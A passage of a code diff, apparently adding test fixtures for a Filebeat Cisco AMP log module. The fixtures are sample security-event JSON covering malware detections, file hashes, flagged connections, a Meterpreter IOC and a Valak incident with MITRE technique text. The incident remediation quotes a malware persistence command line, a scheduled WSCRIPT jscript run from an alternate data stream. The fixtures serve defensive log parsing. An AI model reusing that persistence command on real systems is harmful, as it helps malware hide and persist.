017-11216","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11216"},{"cve":"CVE-2017-11218","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11218"},{"cve":"CVE-2017-11219","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11219"},{"cve":"CVE-2017-11220","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11220"},{"cve":"CVE-2017-11221","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11221"},{"cve":"CVE-2017-11222","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11222"},{"cve":"CVE-2017-11223","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11223"},{"cve":"CVE-2017-11224","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11224"},{"cve":"CVE-2017-11226","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11226"},{"cve":"CVE-2017-11227","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11227"},{"cve":"CVE-2017-11228","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11228"},{"cve":"CVE-2017-11229","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11229"},{"cve":"CVE-2017-11234","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11234"},{"cve":"CVE-2017-11235","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11235"},{"cve":"CVE-2017-11237","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11237"},{"cve":"CVE-2017-11241","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11241"},{"cve":"CVE-2017-11251","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11251"},{"cve":"CVE-2017-11254","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11254"},{"cve":"CVE-2017-11256","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11256"},{"cve":"CVE-2017-11257","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11257"},{"cve":"CVE-2017-11259","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11259"},{"cve":"CVE-2017-11260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11260"},{"cve":"CVE-2017-11261","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11261"},{"cve":"CVE-2017-11262","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11262"},{"cve":"CVE-2017-11263","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11263"},{"cve":"CVE-2017-11267","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11267"},{"cve":"CVE-2017-11269","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11269"},{"cve":"CVE-2017-11270","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11270"},{"cve":"CVE-2017-11271","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11271"}]}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json new file mode 100644 index 000000000000..52efeb8e97ba --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json @@ -0,0 +1,87 @@ +[ + { + "@timestamp": "2020-11-11T09:51:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "1235-1234sdgf-654sdf-7562345", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "192.168.196.22", + "mac": "aa:d9:ac:af:1d:ad" + }, + { + "ip": "192.168.120.1", + "mac": "12:24:56:c2:00:01" + }, + { + "ip": "192.168.160.1", + "mac": "12:50:56:c2:53:08" + } + ], + "cisco.amp.connector_guid": "1235-1234sdgf-654sdf-7562345", + "cisco.amp.detection": "W32.Trojan.22gp.1201", + "cisco.amp.detection_id": "12365423467", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Unknown", + "cisco.amp.group_guids": [ + "6542345gdfs-234-sdf2-34-6345243" + ], + "cisco.amp.related.mac": [ + "aa:d9:ac:af:1d:ad", + "12:24:56:c2:00:01", + "12:50:56:c2:53:08" + ], + "cisco.amp.timestamp_nanoseconds": 153000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 123578990, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "9a8557b98ed1469272fa0ace91d63477", + "file.hash.sha1": "d0c4192b65e36553fvfd2b83f3113f6ae8390baa", + "file.hash.sha256": "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", + "file.name": "HYXiN3hY.exe.part", + "file.path": "\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part", + "fileset.name": "amp", + "host.hostname": "testhost", + "host.name": "testhost", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@domain", + "input.type": "log", + "log.offset": 0, + "process.hash.md5": "e50ab86d5409d4d0ad386b27ea7f78fb", + "process.hash.sha1": "d539afb0991e823c7cdf824b610a5a5d7655a2da", + "process.hash.sha256": "a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab", + "process.name": "firefox.exe", + "process.pid": 88, + "related.hash": [ + "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", + "9a8557b98ed1469272fa0ace91d63477", + "d0c4192b65e36553fvfd2b83f3113f6ae8390baa" + ], + "related.hosts": [ + "testhost" + ], + "related.ip": [ + "8.8.8.8", + "192.168.196.22", + "192.168.120.1", + "192.168.160.1" + ], + "related.user": [ + "user@domain" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log new file mode 100644 index 000000000000..ed37c533eac2 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log @@ -0,0 +1,962 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT 